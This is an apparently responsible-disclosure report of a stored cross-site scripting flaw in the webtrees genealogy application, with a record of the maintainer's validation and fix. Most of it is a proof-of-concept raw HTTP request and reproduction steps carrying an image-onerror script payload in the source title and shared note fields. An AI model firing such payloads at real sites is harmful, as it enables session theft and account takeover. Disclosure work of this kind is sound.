Cross-site Scripting (XSS) - Stored in fisharebest/webtrees

Valid

Reported on

Sep 30th 2021


Description

Multiple Stored XSS when Add new record at features Add a source citation, Add a shared note

Proof of Concept

// PoC.req
POST /demo-stable/index.php?route=%2Fdemo-stable%2Ftree%2Fdemo%2Fcreate-source HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=35jvr7cdk25bf0s6k0e1r91c3e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/
X-Csrf-Token: U4WFspy3SiSfyzQJ9lYihH20kG0SUVKt
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------75901138012122049362463935295
Content-Length: 1331
Origin: https://dev.webtrees.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="_csrf"

U4WFspy3SiSfyzQJ9lYihH20kG0SUVKt
-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-title"

"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-abbreviation"

test
-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-author"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-publication"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-repository"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-call-number"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-text"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="privacy-restriction"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="edit-restriction"


-----------------------------75901138012122049362463935295--

Step to Reproduct

Add a source citation

Goto details of a person. Example: https://dev.webtrees.net/demo-stable/index.php?route=%2Fdemo-stable%2Ftree%2Fdemo%2Findividual%2FI10034%2FAugustus-the-Younger-Duke-of-Brunswick-Luneburg

At Tab Sources choose to Add a source citation

At Source choose to Create a source

At Title input with payload: "><iMg SrC="x" oNeRRor="alert(1);">

Add a shared note

At Tab Notes choose to Add a shared note

At Note choose to Create a shared note

At Note input with payload: "><iMg SrC="x" oNeRRor="alert(1);">

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back 2 months ago
Greg Roach validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach confirmed that a fix has been merged on 6d966f 2 months ago
Greg Roach has been awarded the fix bounty